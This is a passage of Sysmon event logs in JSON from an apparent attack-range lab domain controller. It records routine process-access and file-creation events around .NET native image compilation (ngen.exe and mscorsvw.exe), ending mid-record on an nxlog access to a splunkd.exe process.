C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-134D-5F25-0000-0010B1FE0D00}\r\nTargetProcessId: 3212\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:33.747","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-134D-5F25-0000-0010B1FE0D00}","TargetProcessId":"3212","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8112,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:33.763\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-134D-5F25-0000-0010B1FE0D00}\r\nTargetProcessId: 3212\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:33.763","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-134D-5F25-0000-0010B1FE0D00}","TargetProcessId":"3212","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8113,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:34.154\r\nProcessGuid: {E2A3D6B1-134D-5F25-0000-0010B1FE0D00}\r\nProcessId: 3212\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c8c-0\\System.Activities.DurableInstancing.dll\r\nCreationUtcTime: 2020-08-01 07:01:34.154","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:34.154","ProcessGuid":"{E2A3D6B1-134D-5F25-0000-0010B1FE0D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c8c-0\\System.Activities.DurableInstancing.dll","CreationUtcTime":"2020-08-01 07:01:34.154","EventReceivedTime":"2020-08-01 07:01:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8114,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:34.201\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-134E-5F25-0000-0010FC040E00}\r\nTargetProcessId: 4300\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:34.201","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-134E-5F25-0000-0010FC040E00}","TargetProcessId":"4300","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8115,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:34.201\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-134E-5F25-0000-0010FC040E00}\r\nTargetProcessId: 4300\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:34.201","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-134E-5F25-0000-0010FC040E00}","TargetProcessId":"4300","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8116,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:34.201\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-134E-5F25-0000-0010FC040E00}\r\nTargetProcessId: 4300\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:34.201","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-134E-5F25-0000-0010FC040E00}","TargetProcessId":"4300","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8117,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:34.404\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010820D0B00}\r\nTargetProcessId: 4440\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:34.404","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010820D0B00}","TargetProcessId":"4440","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8118,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:34.404\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010820D0B00}\r\nTargetProcessId: 4440\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:34.404","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010820D0B00}","TargetProcessId":"4440","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8119,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:34.419\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-134E-5F25-0000-0010150A0E00}\r\nTargetProcessId: 4440\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:34.419","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-134E-5F25-0000-0010150A0E00}","TargetProcessId":"4440","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8120,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:34.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 